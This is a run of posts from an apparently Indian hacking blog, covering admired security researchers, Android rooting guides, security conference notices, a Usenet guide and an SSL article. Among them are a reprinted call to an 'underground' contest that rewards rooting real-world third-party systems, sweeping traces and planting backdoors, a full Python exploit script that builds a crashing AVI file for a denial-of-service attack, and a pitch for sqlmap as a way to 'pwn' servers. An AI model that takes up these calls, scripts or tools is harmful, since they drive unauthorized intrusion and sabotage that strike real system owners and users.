Top Indian Hackers | Real Hackers of India

There has been a lot of commotion in the Indian Hacking scene lately, and I expressed some pretty strong views regarding that. When it comes to hacking, every other guy tends to tape the "hacker" word with his name/codename without even realizing its significance. Then there is Facebook ...Have a look at it -


Seriously guys..what were they thinking ?! I am still counting the number of “Indian Cyber Army” India has and the number of groups tend to increase recycling all the content, same VIP forums, same deface techniques, zero original research.  
Then there is Ankit Fadiya...dont let me even get started...

In the end tired of all the bullshit around, I decided to cover an article on the REAL INDIAN HACKERS (or Hackers of Indian Origin), folks who are actually dedicated to security and are hackers in real sense. Lets start, shall we ?

Pranav Mistry


The famed 6th sense developer,Pranav Mistry is a research assistant and a PhD candidate at MIT Media Lab. SixthSense has recently attracted global attention. Among some of his previous work, Pranav has invented Mouseless - an invisible computer mouse; intelligent sticky notes that can be searched, located and can send reminders and messages; a pen that can draw in 3D; and a public map that can act as Google of physical world. Pranav has commercialized his invention, the sixth sense and SixthSense is now being actively used at NASA. It is rumored that Facebook tried to acquire the technology from Pranav for a reportedly $2 billion and 5% ownership of Facebook, but Pranav decided to open source it instead.



Thats what any real hacker do. Hats Off to him.
Here you can read more about him at Amarjit’s Blog


Koushik Dutta or “Koush”

“Set Your Phone Free..”

Rings a bell ? Koushik Dutta or “Koush” is responsible for Clockworkmod recovery and Rom Manager for Android rooting and the core member of famed UnrEVOked team. He has been a .net developer from heart and had his internship initially at Microsoft and is a former MVP. He decided to leave Microsoft and hack Android cellphones like there was no tomorrow. Sony approached him after geohot humped them like anything but he politely declined .


Bravo for his efforts, we are able to root painlessly using UnREVOked.
Now only if UnrEVOked can release UnrEVOked 3.33 soon :)

Vivek Ramchandran


Vivek Ramachandran has been working in the computer and network security domain, in some form or the other, for the past 7 years and has worked with Industry giants like Reliance, Cisco, Microsoft. He was among the Top 10 Indian finalists in the Microsoft shootout competition among the list of 65000 participants. Then he decided to join Airtight Networks and there discovered Caffe Latte attack attack along with his colleague MD Sohail Ahmad from Airtight Networks ,the wifi hacking technique that doesn't required you to be in active vicinity of the wifi zone. 

That said, he is one of the researcher to lookout.

Almost everybody at NULL Security Community & Garage4hackers
I said it before and I will say it again, the Only active Indian hacking community is NULL community, and the best Indian Hacking Forum where real hackers meet is garage4hackers.com hands on.


Shoutz to garage crew :)

Folks at Indian Honeynet Chapter
Now we are talking..Indian Honeynet chapter is the collaborative effort of the best geeks and hackers .The focus of honeypot is on Worms and Botnets and developing an Open Source tool to study and counter brute force attacks/ phishing through wifi. Its also being setup as potential web-app honeypot,and aims on improving detection and forensic techniques.  Heading the ship are L Shriram, K K Mookhey, Amit Chugh, Asim Jakhar and a lot of professionals who are dedicated in the field of computer security.


Hari Prasad

The famed security researcher Hari Prasad is the winner of EFF Pioneer award, as he along with Alex Halderman, and Rop Gonggrijp were able to study an electronic voting machine (EVM) and found significant vulnerabilities that would not be difficult to execute. For his troubles, Prasad was arrested and jailed in August, held without bail in Mumbai for a week. Though he is now out on bail and in the United States, he still faces criminal prosecution for alleged theft of the EVM and other charges.

The genius of the Indian system is that instead of making machines tamper proof and more efficient, they arrested him.

According to the Indian news agency PTI, the magistrate who released Prasad on bail noted that "no offence was disclosed with Hari Prasad's arrest and even if it was assumed that [the electronic voting machine] was stolen it appears that there was no dishonest intention on his part...he was trying to show how [electronic voting] machines can be tampered with."

Jayant Krishnamurthy



Jayant Krishnamurthy is a Ph.D. candidate in Computer Science, CMU and his interests include are machine learning, machine reading, common sense reasoning, information extraction, knowledge representation, and their applications in AI and NLP (shamelessly taken from his website). He is one of the researchers who are behind designing MD6 algorithm (yeah you heard it right, the evolution of MD5). He is a top level computer theorist and researcher and is a real life hacker. He teaches computer and network security and you must ahve a look at the problems and solutions at the given link.

For the lighter side,you can have a look at the funny flash movie based on his real life experiences at high school.


I guess, you now have an actual idea of the Indian hackers now :) These guys are real and are deemed worthy of having the hacker emblem with them.

How to Sync Facebook Calendar on Google Calendar & Android

One of the things that have been pesking me since the time I moved on to Android Cyanogenmod 7 was that I was not able to sync Facebook Calendar with Google Calendar or Outlook. Also since I was unable to sync Facebook Calender with Google Calendar hence the I was not able to sync Facebook birthdays on Android . That make me thinking and I got some nifty methods to do the same.

Method 1 (Sync Facebook Birthdays on Google)

Install Ebobirthday application on Android

Open it and click on

menu – > Import – > Facebook

and let it connect to it.

Once connected enter your username and password, and allow it to access data. The it will start importing birthdays. Once done, click on

menu –> settings

and then choose calendar which you want to update.

then go to

menu –> export –> update calendar

and then it will connect and will update your google calendar :)

Once done, sync your Android and Google. Alternatively you can sync outlook calendar with Google

 

 

Congrats..you have synced Facebook calendar with Google and Outlook !

I will discussing the method 2 on my next post :)

Android 2.33 Exploit Android 3.0 & Unrevoked 3.33 may launch soon

Sebastian Krahmer the famed “rage against the cage” exploit dev has released the latest version of exploit that exploits Android 2.3.3 Gingerbread and may also  exploit Android 3.0 Honeycomb and may also exploit Android 2.2 Froyo. As the official post claims -

Free your phone, once again. Successfully tested on Gingerbread (2.3.3) but might also run on Froyo and Honeycomb. If it fails there, some offsets and indexes need to be adjusted which is left to the reader.
NOTE: You use it at your own risk! I am not responsible for any failure or damage. Make sure to read the README file carefully! Download it here. If you successfully run it anywhere, please make a comment with exact device model/firmware running.
 
[Update] I replaced the tarball with a new version to fixsome glitches while parsing vold.fstab. Should now also work on the GalaxyS. Thx to Chainfire.

You can download the exploit here .Or you can visit the blog here 
The best part ? Since the exploit is released, we can expect Unrevoked team to release Unrevoked 3.33 soon :)
In the mean time, you can read how to root HTC Wildfire 2.2.1

HTC wildfire 2.2.1 root to HTC wildfire Android 2.3 | Install Android 2.3 on HTC Wildfire | How to root Htc Wildfire 2.2.1

Sometime ago I got an HTC Wildfire and was having loads of fun using it, but every time I wanted to do anything more  "creative" i was stopped by the binded nature of phone, hence i decided to root it (jailbreak it apple fellas) and get complete control over my device. Here, I am covering step by step guide to root HTC wildfire 2.2.1 and install Android 2.3 on HTC Wildfire.

To do the rooting you must have your Wildfire with S-OFF, HBOOT 1.02.0002 and Android 2.2.1 . You can check it by booting into HBOOT (power on your phone by holding the VOLUME DOWN + POWER button) .This method is strictly for the 2.2.1 owners. How you can turn the S-OFF is your headache, you can try the alpharev (ask the team if they can get you a 2.0 test version... :P) or you can wait for Unrevoked 3.33 or you can straight off go to market and hunt for XTC clip. Either way, try it and don't attempt to anything before you get S-OFF. Actually the notorious S-ON flag is the cause rooting wildfire is such a pain in the a**.
I used to have this

and I converted it into this :)

or this =)

Anyways, here is how you can root HTC wildfire 2.2.1 and get htc wildfire Android 2.3

What you need ?

• HTC wildfire with S-OFF , HBOOT 1.01.0002 , OS Froyo 2.2.1
• USB Drivers (Download)
• RUU Rom 2.1 / RUU_Buzz_HTC_WWE_1.14.405.2_R_Radio_13.45.55.24_3.35.15.31_release_130814_signed (Download)
• Unrevoked 3.2 Test version (Download)
• Cyanogenmod 7 (Download) and Google Apps (Download)
• Time and Patience & last but not the least,
• Balls of Steel

    Disclaimer

    I am not responsible if your phone gets bricked, by following the process you are voiding your warranty and significant damage may be caused to your device.
    Its all for educational purposes only, if you are dumb enough to screw somewhere then I will be the one who will be laughing at you.
    Software are unpredictable in nature, one may/may not act as predicted especially in case of rooting (personal experience). Hence my friend, tread carefully.
    in short,

I AM NOT RESPONSIBLE FOR YOUR STUPIDITY.

Step 1 - Installing the USB drivers

Download USB drivers and extract them on desktop. Turn off your wildfire and boot into HBOOT by holding the VOLUME DOWN + POWER button. Connect your phone to your PC and it will show "drivers installing" or similar there for Android device. When prompted , install the drivers by going to device manager and browsing to the folder where you extracted the drivers. Once installed, disconnect and reboot your phone normally.

Now you need to install the Android bootloader interface. Connect it to your HTC wildfire to the PC and it will ask for drivers again, now go to device manager, click on unknown device,

click on update driver -> install from specific location -> No i will choose to install -> choose Android phone and click on adb interface -> click next -> when asked to install click on continue anyway, just install them.

Once done you will see your phone recognized as "Android bootloader interface". Now disconnect your phone and go into

settings -> applications - > development - > enable USB Debugging.

Congratulations, the first step is complete.

Step 2 - Downgrading from Android 2.2.1 Froyo to Android 2.1 Eclair

Download the RUU rom which is an original stock rom. Plug your phone into the PC and set it to "Charge through USB". Double click RUU rom .exe. Follow the on screen instructions and then let it install. Your phone will reboot into stock HTC 2.1 :) This will be the last time you will be seeing it though.

The HBOOT version will be now 0.80.0002 (check it by powering on your phone by holding the VOLUME DOWN + POWER button)  Once done disconnect your phone.

Step 3 - Gaining root using UnrEVOked , get clockworkmod and set your phone free :)

Download the test version of unrevoked. Let me repeat, DO NOT USE UNREVOKED 3.32 as it will lead to CID errors or to be precise this error

"validation error backup cid is missing"

This may be caused as the 3.32 doesnot support HBOOT 0.82.0002. Hence You need specific test version of Unrevoked 3.2 to do the job. Download it, save it on desktop, and run it. Now connect your phone and the rooting will start. Once donw, you will have Clockworkmod recovery installed on your phone. Reboot your phone now (using the VOLUME UP/DOWN key for navigation and clicking using TRACKBALL, the POWER button takes you back in menus). Once rebooted, you will see the superuserapp in your phone and congratulations, your phone is successfully rooted :)

Step 4 - Installing Cyanogenmod 7 or Android Gingerbread 2.3.3

Download the Cyanogenmod 7 with google apps and save it on desktop, connect your phone as USB diskdrive and transfer both zip files on SD card. Once done, reboot your phone into ClockworkMod Recovery (booting by holding the VOLUME DOWN + POWER button and clicking on recovery)

Once the device boots into the ClockworkMod Recovery, use the side VOLUME buttons to move around, and either the POWER button or the TRACKBALL to select.

• Select the option to Wipe data/factory reset.
• Then select the option to Wipe cache partition.
• Select Install zip from sdcard.
• Select Choose zip from sdcard.
• choose update-cm-7.0.0-buzz-signed.zip & Let it install.
• Once done, Select Install zip from sdcard.
• Select Choose zip from sdcard, choose gapps-gb-20110307-signed.zip
• Once the installation has finished, to get back to the main menu by clicking the POWER button and select the Reboot system now option.

Congrats..The HTC Wildfire should now boot into CyanogenMod.

Enjoy Android 2.3.3 :)

Special thanks to 3xeno 

greetz fly to Singla | Parul | Nilesh | Satwik Bhai | Broken Angel | Rahul Bhai

TakeDownCon Dallas – EC Council Information Security Conference

Announcing TakeDownCon Dallas - May 14-19 - Dallas, TX & It’s right around the corner. TakeDownCon Dallas - the inaugural event in EC-Council’s new technical IT security conference series - will be taking place from May 14-19, at the InterContinental Dallas, in Dallas, TX. 

Pre-event training, from the EC-Council and their new Center for Advanced Security Training (CAST), will run from May 14-17, and cover their renowned, recently DoD Directive 8570-accepted Certified Ethical Hacker (CEH) version 7, the Certified Security Analyst (ECSA), as well as the Computer Hacking Forensic Investigator (CHFI) program.

Following the pre-event training is a two-day conference featuring three tracks -- "No Holds Barred," on day one (May 18), and two parallel tracks, "Attack Zone" and "Defense Sector," on day two (May 19).

The "No Holds Barred" track will kick things off, and include:

• Keynote by Barnaby Jack, who most recently gained media attention for his ATM hacking demonstration at Black Hat USA 2010
• Release of hardware pen-testing device, PlugBot, by security researcher Jeremiah Talamantes
• Other advanced talks on everything from automated malware analysis to hacking SCADA

The "Attack Zone" and "Defense Sector" tracks, preceded by a keynote on the anatomy of database attacks, from Josh Shaul and Alex Rothacker, will wrap things up, and include presentations such as:

• Analyzing and hacking smart phone security models
• Taking down government system security
• Attacking and defending the Smart Grid

Also launching will be "Nite Locks et al," an event that gives attendees a hands-on opportunity to test their lock-picking skills under the tutelage of experts.

Delegates of TakeDownCon will enjoy the special rate of $109/night, at the InterContinental Dallas.

For more information on the dozens of other technical presentations and training courses, along with a full program, presentation synopses, and registration details, click here.

Recon 2011 Call for papers (CFP) security conference

RECON is a computer security conference with a focus on reverse engineering and advanced exploitation techniques. It is held annually in Montreal, Canada. 

The conference offers a single track of presentations over the span of three days along with technical training sessions held before and after the presentation dates. Technical training varies in length between one and three days.

 

+                    +                     +         +
                              +                  +           +
       +                                             +
                                    \ /
                   +     _        - _+_ -                   ,__
     _=.    .:.         /=\       _|===|_                  ||::|
    |  |    _|.        |   |     | |   | |     __===_  -=- ||::|
    |==|   |  |  __    |.:.|   /\| |:. | |    |   | .|| : |||::|
    |  |-  |.:|_|. :__ |.: |--|==| |  .| |_   | ' |. ||.  |||:.|
  __|. | |_|. | |.|...||---|  |==| |   | | |_--.     ||   |||. |
|  |  |   |. | | |::.||: .|  |==| | . : |=|===|    :|| . ||| .|
|:.| .|   |  | | |:.:|| . |  |==| |     |=|===| .   |'   | |  |
|     |      |   |   |'           :   .   |   ;     ;    '    |
'     :      `   :   '            .       '  .      .         :
'     .                   R E C O N     2 0 1 1     .
`                .                .                           '
                       .           C F P

http://www.recon.cx

REC0N 2011
JULY 8-10
HYATT REGENCY (New venue)
M0NTREAL

+ REC0N 2011
- Conference and training
- No censorship, no sales pitches
- CFP closes May 15, 2011
- Registration is open, only 170 tickets left

+ Accepted Talks
- Sticky Fingers & KBC Custom Shop by Alexandre Gazet of Sogeti/ESEC & Metasm
- Designing a minimal operating system to emulate 32/64bits x86 code snippets, shellcode or malware in Bochs by Elias Bachaalany of Hex-Ray
- Practical C++ decompilation by Igor Skochinsky of Hex-Ray
- RFID Hacking by Milosch Meriac of Bitmanufaktur & OpenPCD
- AndBug -- A Scriptable Debugger for Android's Dalvik Virtual Machine by Scott Dunlop of IOActive
- Memory Eye by Yoann Guillot of Sogeti/ESEC & Metasm

+ Training
- Binary Literacy: Static Reverse Engineering by Rolf Rolles
- Windows Internals for Reverse Engineers by Alex Ionescu
- Bug Hunting and Analysis 0x65 by Aaron Portnoy and Zef Cekaj
- Reverse engineering software protections by Tomislav Pericin and Nicolas Brulez
- The exploit laboratory Advanced Edition by Saumil Shah and Josh Ryder
- Introduction to Penetration Testing Web Applications by David Mirza
- Holistic RFID Hacking by Milosch Meriac

+ Still accepting submissions
- Single track
- 60 & 30 minute time slots
- Lightning talks at the party

+ Primary topics
- Reverse engineering and/or exploitation:
  + Software
    - Malware
    - Protection/DRM
    - Anti-reversing
    - Static/runtime analysis
  + Hardware
    - Embedded devices, consoles, femtocell
    - Cellphones
    - RFID, SDR (software defined radio)
    - Side channel attacks
    - Physical security (cameras, access control)
  + Protocol
    - GSM / CDMA

+ Also of interest to us
- Privacy
  + Anti-censorship
  + Anti-surveillance
  + Anonymity
  + Counter-forensics

+ Anything else elite

+ Please include
- Short summary
- Name or alias
- Contact information
- Bio

+ Send submissions to
- cfp2011 @ recon.cx

+ Speaker / attendee privacy
- Recon does not require speakers to use their real names
- Recon does not provide attendee or speaker information to third-parties (except where necessary for registration/payment)

Guide to Usenet | Usenet – download faster than torrents | Fastest download speeds

I am pretty much bombarded with questions regarding Usenet in my seminars and on my email, so I thought why not to cover a guide over it. Usenet is the granddaddy of networks, yep, I said it. You might flame me by citing Arpanet and some other primitive networks, but then again, it was Usenet which prevailed massively before the modern Internet and was the hip thing which allowed to share binary files,movies (even your fantasy p**n stuff ), games and a lot more. Basically Usenet was a kind of BBS where the first generation of geeks shred what they had, in the 80’s, someone came with an idea of sharing binary files (read:your standard files) over Usenet and there we go, it became a phenomenon. Most people joined Usenet so as to get access to those files and trust me; it was a phenomenon to witness.

Usenet is based on decentralized servers which share content with each other over UUCP protocol, and has content arranged in a hierarchical manner.

• Enough theory, lets get on to some interesting facts (in context with torrent junkies and conspiracy theories :P ):
• Usenet is faster than the fastest of Torrent Trackers, BLAZING fast speeds,and I mean it.
• Usenet has a lot more data categorized there to be picked by the worthy then your best Torrent tracker can ever get.
• No Seeding, No Uploading, Instant Speeds ! It’s a wonderland for 24X7 downloaders.
• Usenet is dying, and whatever is left of it, is quite different from what it originally was.
• Usenet is dying because government can’t control it.

Ridiculously , we all have heard of Usenet , but as far as I know people, nobody uses it. I got my first slice of it in 2007 and since then, I have loved every bit of it. It’s an outstanding archive of data which you may not find over Internet, yep, it’s that good.

The primary reason Usenet is not so popular because people just don’t want to use their heads. They just want a point-click-download option to download their files. As compared to traditional downloading and torrents, Usenet is a bit different to setup, and I will tell you how to set it up, really.

Step 1 - Choose Your Usenet Service

Long ago, ISP’s hosted Usenet binaries and provided access to Usenet and news servers. They were happy with people connecting and subscribing to these services and infact actually supported by giving long retention time (the time for which a file is hosted over a Usenet server) to the binaries. But then the advances in technology gave people amazing speeds and faster broadband connections and they literally abused by downloading like there was no tomorrow. Further the government was pissed off by the amount of illegal data (read:child p**n and sm*t) hosted there and decided to shut it off, although not fully successful, the ISP responded by putting bandwidth constraints , restricted content and a lot of weird measures.

Anyways, to get to the mother load of the downloading, you need access to the alt.binaries content and for that, you need to buy access. Really Sorry! But Usenet isn't a p2p and you have to pay for bandwidth and storage it if you want to use it. The best news? for a meager 15$ per month you get a month for unlimited, unthrottled access. Okay, it might be a lot for you, but if you want to have a Usenet experience, you can have a free trial at Usenet providers like GigaNews or Astraweb. Don't forget to look at -

• The retention time.(300 days +)
• The number of parallel connections (more connections, more speed, but it stops meaning anything unless you are on a 100Mb pipe)
• Download limits (amount of data you can download..obviously)

Step 2 - Choose your Client

Again, just like you use utorrent / xunlei to download your torrents, you need a client to download yor files through Usenet. Someties you may have noticed a torrent file which is broken into 20 MB rar files each, probably that file has been downloaded from Usenet and uploaded to torrent, as in Usenet a file can not be uploaded beyond a fixed size, that too in a compressed form. The real trouble starts to download and organize those files, but fear not, thats what are Usenet clients for; they download and join those compressed files into one automatically. My favorite one is SABnzbd, and I will be covering the rest of guide taking it in view. Like torrent files (.tor), in Usenet NZB files are used to point out and download files, your client will be able to figure it out.

Download SABnzbd

Run the program and SABnzbd will open in a browser window.

Now click on “Config” tab and click on “servers”

 

Enter the server settings your Usenet provider gave you after signup (Astraweb's at left). Staying in the "Config" page, click "Folders"

Select the folder where you want to download files and the temporary files folder (pretty standard stuff) .Also choose a "Watched" folder where the NZB files will be placed and SABnzbd will know what you want it to download. Make it a place that's easy for you to save to, from a browser.

Once done, you are ready to explore Usenet.

Step 3 – Downloading files

“Usenet is like a herd of performing elephants with diarrhea- massive, difficult to redirect, awe-inspiring, entertaining, and a source of mind boggling amounts of excrement when you least expect it”

- Gene Spafford

Yep..Usenet is an incomprehensible mess. Thats why they created search engines like Newzbin (paid and invite only), NZB.org, Binsearch, Newsleach to find your files using NZB format and to download it. Think of it like torrent search engine where you find your favorite files.

Once you find your NZB, download it to the your "Watch" directory and SABnzbd will take care of it . Or you can download it wherever you want, and add it manually to SABnzbd by going to "Add File". Once done, you will have something like this -

It's working! And yes, it's really going that fast.

But if If it's not downloading, you may need to check your server settings as some ISPs block the default port, 119. WOrry not, you can use another one that your provider supports. 8080,1818 are some common ones.

Once downloaded, it will automatically be joined and served with chilled beer (just kidding)

Thats Usenet :)

Enjoy…

SSL is broken and Hackable – A study | Hack SSL

Dan Goodin at El Reg has presented a wonderful analysis of Secure Socket Layers (SSL) and how broken and hackable SSL is. SSL has been compromised recently in the RSA hack, and the study exposes the very causes of the broken implementations of SSL and its inherent weaknesses. The article is a must read, here is an excerpt from the original article -

Every year or so, a crisis or three exposes deep fractures in the system that's supposed to serve as the internet's foundation of trust. In 2008, it was the devastating weakness in SSL, or secure sockets layer, certificates issued by a subsidiary of VeriSign. The following year, it was the minting of a PayPal credential that continued to fool Internet Explorer, Chrome and Safari browsers more than two months after the underlying weakness was exposed.

And in 2010, it was the mystery of a root certificate included in Mac OS X and Mozilla software that went unsolved for four days until RSA Security finally acknowledged it fathered the orphan credential.

This year, it was last month's revelation that unknown hackers broke into the servers of a reseller of Comodo, one of the world's most widely used certificate authorities, and forged documents for Google Mail and other sensitive websites. It took two, seven and eight days for the counterfeits to be blacklisted by Google Chrome, Mozilla Firefox and IE respectively, meaning users of those browsers were vulnerable to unauthorized monitoring of some of their most intimate web conversations during that time.

Read the full article here

The Underground Cyber Hacking Challenge – OpenHax 2011 (op3nh4x 2011)

0p3nH4x is the first of its kind "underground cyber hacking challenge". A challenge by hackers for hackers to test real  skills in the field.  We are challenging all hackers no matter if you are black or white "hatted". It's time to prove that your preferred community is not so skid.

You can have a look at the original pastebin paste

_____        _____       _   _   ___                 _  _    __          _____  _____  __   __ 
|  _  |      |____ |     | | | | /   |              _| || |_ /  |        / __  \|  _  |/  | /  |
| |/' |_ __      / /_ __ | |_| |/ /| |__  __       |_  __  _|`| |        `' / /'| |/' |`| | `| |
|  /| | '_ \     \ \ '_ \|  _  / /_| |\ \/ /        _| || |_  | |          / /  |  /| | | |  | |
\ |_/ / |_) |.___/ / | | | | | \___  | >  <        |_  __  _|_| |_       ./ /___\ |_/ /_| |__| |_
\___/| .__/ \____/|_| |_\_| |_/   |_//_/\_\         |_||_|  \___/       \_____/ \___/ \___/\___/
      | |The Underground Cyber Hacking Challenge                                                                                       
      |_|                                                                                       

~~~ Menu of the day ~~~

0x00 - 0p3nH4x #1 2011 - Ezine #1
0x01 - The structure of 0p3nH4x #1 2011
0x02 - About the targets
0x03 - Goals
0x04 - Points system
0x05 - Reporting and Documentation
0x06 - Prizes, biatchez
0x07 - Rules
0x08 - Registrations and information
0x09 - About the idea and final words
~~~ Menu of the day ~~~

[ 0x00 - 0p3nH4x #1 2011 - Ezine #1 ]

0p3nH4x is the first of its kind "underground cyber hacking challenge". A challenge by
hackers for hackers to test real skills in the field.  We are challenging all hackers
no matter if you are black or white "hatted". It's time to prove that your preferred
community is not so skid.

Through 0p3nH4x we are trying to wake up the scene(or what's left of it) and get it to
a new improved "skin" but with the same original concept in the background. Through these
ezines we will be "reporting" main events and progress around 0p3nH4x and more.

[ 0x01 - The structure of 0p3nH4x #1 2011 ]

The challege is built in two phases, appropriately called "Phase 1" and "Phase 2".

As you know, ANYONE can register, no matter of their ethics, age or nationality,
this is why "Phase 1" is the qualification phase where all participants will have to pwn
as many targets as they can to gather the points. Once you reach the needed minimum of
points to continue to the next phase, you will be given instructions manually as well as
access to special section in the forum. Only 250 hackers will reach the second phase.

Each phase will last 240hrs or *10* days with a break of 48hrs or 2 days between them.
Documentations can be submitted 24hrs after the time is up.

[ 0x02 - About the targets ]

L37s 0wn s0m3 wh173h47 b17<h3s 4nd n00bs.

We really wanted 0p3nH4x to be unique, to put real skills on the REAL field not some labs
in a basement with pre-installed vulnerable services on them. Targets are NOT hosted
locally, they are real-world ones, so do take note. They all have been chosen very carefully
and checked(aka pwn3d) that they can be exploited in (maybe) not only one way. Some targets
are easy others are not, that's why different owned targets bring you different amount of
points.

[ 0x03 - Goals ]

Your primary goals:
- Get root on pointed targets.
- Document the break-in (see documentation section in the zine)
- Sweep your traces
- Follow the rules (see rules section in the zine)

Your secondary(optional) goals:
- Get root access to other systems in the network.
- Compromise additional services including back-end ones.

[ 0x04 - Points system ]

As you already know each target gives you different amount of points. For phase 1, the maximum
amount is 100 points, where 90% ownage and 10% documentation. For phase 2, previous points are
cleared and you start on fresh with the maximum amount of points you can gather - 100 again.

Winners(first 250 hackers) from phase 1 will be judged by this criteria:
* Points gathered - 90% of final score
* Documentation - 10% of final score

Winners(1st and second place) from phase 2 will be judged by this criteria:
* Points gathered - 70% of final score
* Documentation - 30% of final score

If you complete any of the secondary(optional) goals:
* 5 points per compromised(root) machine in the subnet/back-end.
* 1 point per extra creditentials/back-end services(non-root).

[ 0x05 - Reporting and Documentation ]

For phase 1 documentation is not that essential or it's not needed to be in pdf format with no
grammar mistakes, how you got in, images etc., not needed. A simple hax log with proof of your
penetration into the network/system and a working backdoor for us to verify.

For phase 2 documentation brings 30% of the final score, therefore, you have to put some work
on it - minimal amount of grammar mistakes, images, methodology explained, full step-by-step,
exploit modifications PoC(if any) etc. Again, you will need to prove your penetration into the
network/system with a backdoor for us to verify.

Note: Backdoor verifications are needed so that hackers won't cheat and "give their friends
hax log to modify and get to next phase or win". We want to prevent such things so each
hacker will show his own backdoor that he has placed.

Dead line for documentation submissions can be submitted 24hrs after the phase has ended.
They have to be posted in the special section in "0p3nH4x 2011" called "Documentations".
There, you can ONLY see your own documentation submissions(threads) and others can't see yours
but only their own.

[ 0x06 - Prizes, biatchez ]

Place:
1st - DUS student hacking course + Verified status @ DUS forum + VIP @ Belegit +
+ *** HIDDEN PRIZE *** + *** HIDDEN PRIZE ***
2nd - 50% discount of DUS student hacking course + Verified status @ DUS forum + VIP @ Belegit

All other participants which finish from 3rd to 5th place will get Verified status @ DUS
forum OR VIP @ Belegit by their choosing.

[ 0x07 - Rules ]

Rules:
1. Don't be a fag/skid, no DoS or DDoS on targets or the scoreboard/forum, we are watching.

2. No defacing on targets, you need to be a ninja.

3. No "too" disruptive attacks please – the aim is that everyone gets to enjoy the challenge.

4. Respect your fellow hackers – do not change configurations of machines once
compromised, it's only for fun.

5. This includes closing exploitable ways, changing of passwords, deleting files or
otherwise making the targets unavailable to others.

6. Any method of breaking in is allowed. No DoS/DDoS, please!

7. Anyone found disregarding these rules will be disqualified... and punched in the face.

[ 0x08 - Registrations and information ]

To register for 0p3nH4x #1 2011 simply register in the forum and post your registration
request in the appropriate forum of the "0p3nH4x 2011" section. Your account will be
approved shortly (anyone can join).

Deadline for registrations for the underground hacking challenge is 8th May 2011
at 00:00 GMT. Afterwards, DUS forum registrations(probably) will be opened but the
"Registrations" section will be closed.

Additional information including extra instructions, rules, targets etc. will be
posted on 9th of May, around 14:30 GMT.

The forum can be found here(it does NOT and will NOT have any domain name)
-> http://178.86.5.192/f0rum/

[ 0x09 - About the idea and final words ]

The idea was to create a tournament or hacking challenge to push the limits of
hackers brains and to stimulate others to join, this way to, in some form, take back
the scene, own some white hat fags/ppl who think they are elite on way and have fun.

0p3nH4x #1 2011 proudly gives shouts to DarkUnderground Security(DUS)(creators)
and Belegit(supporters).

There isn't more to say actually... we'll be waiting for you in the shadows.

That said, is more than enough :)

Window Media Player and Movie Player Buffer overflow DDOS attack – Exploit Code for Buffer Overflow

I came across an interesting buffer overflow exploit which exploits the memory vulnerability in Movie Player and can also be used successfully against Window Media Player. The exploit can be used to perform a Denial of Service attack and  causes the application to crash. For those who don't know about Buffer Overflow, can read the article here.

If run properly, many a times, there is a crash every-time whenever the victim opens the folder in which the Exploit is placed. Here is the exploit coded by ^Xecuti0N3r & d3M0l!tioN3r

 

#!/usr/bin/python
#(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit
#(+)Software Link: http://www.movieplay.org/download.php
#(+)Software  : Movie Player
#(+)Version   : v4.82
#(+)Tested On : WIN-XP SP3
#(+) Date     : 31.03.2011
#(+) Hour     : 3:37 PM
#Similar Bug was found by cr4wl3r in MediaPlayer Classic

print " _______________________________________________________________________";
print "(+)Exploit Title: Movie Player v4.82 0Day Buffer overflow/DOS Exploit";
print "(+) Software Link: http://www.movieplay.org/download.php";
print "(+) Software  : Movie Player";
print "(+) Version   : v4.82";
print "(+) Tested On : WIN-XP SP3";
print "(+) Date      : 31.03.2011";
print "(+) Hour      : 13:37 PM    ";
print "____________________________________________________________________\n    ";
import time
time.sleep (2);
print "\nGenerating the exploit file !!!";
time.sleep (2);
print "\n\nMoviePlayerExploit.avi file generated!!";
time.sleep (2);

ExploitLocation = "C:\\MoviePlayerExploit.avi"
f = open(ExploitLocation, "wb")
memoryloc ='\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00';
f.write(memoryloc)
f.close()

print "\n\n(+) Done!\n";
print  "(+) Now Just open MoviePlayerExploit.avi with Movie Player and Kaboooommm !! ;) \n";
print "(+) Most of the times there is a crash\n whenever you open the folder where the MoviePlayerExploit.avi is stored :D \n";

time.sleep (2);
time.sleep (1);
print "\n\n\n########################################################################\n (+)Exploit Coded by: ^Xecuti0N3r & d3M0l!tioN3r \n";
print "(+)^Xecuti0N3r: E-mail \n";
print "(+)d3M0l!tioN3r: E-mail \n";
print "(+)Special Thanks to: MaxCaps & aNnIh!LatioN3r \n";
print "########################################################################\n\n";
time.sleep (4);

You need Python to compile it, once compiled, you can test it in a virtual machine. Try opening it using Window Media Player, it will crash instantly. The more ingenious of you can get naughty with it :)

cheers..

Download SQL Injection tool - SQL injection automated software SQLMAP

Sqlmap is an open source command-line automatic SQL injection tool and its goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specified DBMS tables/columns, run his own SQL statement, read or write either text or binary files on the file system, execute arbitrary commands on the operating system, establish an out-of-band stateful connection between the attacker box and the database server via Metasploit payload stager, database stored procedure buffer overflow exploitation or SMB relay attack and more.Enthusiastics can experiment with its opotions and pwn many of the servers around,or can test their skills to secure their servers..but remember,SQL map is a tool,its might help you to find and apply vulnerabilities and injections,but in the end,you really must have a good knowledge of SQL some real pwning out there..
You Can download sqlmap 0.7 here:

Linux Source: sqlmap-0.7.tar.gz
Windows Portable: sqlmap-0.7_exe.zip